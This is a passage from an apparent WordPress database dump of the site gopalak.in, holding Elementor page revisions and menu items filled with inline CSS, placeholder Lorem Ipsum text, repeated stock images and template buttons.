.elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:40:03','2022-09-21 05:10:03','',1373,'https://gopalak.in/?p=1388',0,'revision','',0),(1389,1,'2022-09-21 10:40:03','2022-09-21 05:10:03','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 10:40:03','2022-09-21 05:10:03','',1373,'https://gopalak.in/?p=1389',0,'revision','',0),(1391,1,'2022-09-21 11:26:18','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2022-09-21 11:26:18','0000-00-00 00:00:00','',0,'https://gopalak.in/?p=1391',1,'nav_menu_item','',0),(1392,1,'2022-09-21 11:26:18','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2022-09-21 11:26:18','0000-00-00 00:00:00','',0,'https://gopalak.in/?p=1392',1,'nav_menu_item','',0),(1393,1,'2022-09-21 11:46:31','2022-09-21 06:16:31','','home','','publish','closed','closed','','home-3','','','2022-09-21 11:46:31','2022-09-21 06:16:31','',0,'https://gopalak.in/?p=1393',1,'nav_menu_item','',0),(1394,1,'2022-09-21 11:46:31','2022-09-21 06:16:31','','shop','','publish','closed','closed','','shop','','','2022-09-21 11:46:31','2022-09-21 06:16:31','',0,'https://gopalak.in/?p=1394',2,'nav_menu_item','',0),(1395,1,'2022-09-21 12:46:40','2022-09-21 07:16:40','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:46:40','2022-09-21 07:16:40','',1373,'https://gopalak.in/?p=1395',0,'revision','',0),(1396,1,'2022-09-21 12:46:40','2022-09-21 07:16:40','<style>/*! elementor - v3.7.6 - 15-09-2022 */\nbody.elementor-page .elementor-widget-menu-anchor{margin-bottom:0}</style>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 12:46:40','2022-09-21 07:16:40','',1373,'https://gopalak.in/?p=1396',0,'revision','',0),(1397,1,'2022-09-21 12:46:41','2022-09-21 07:16:41','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img 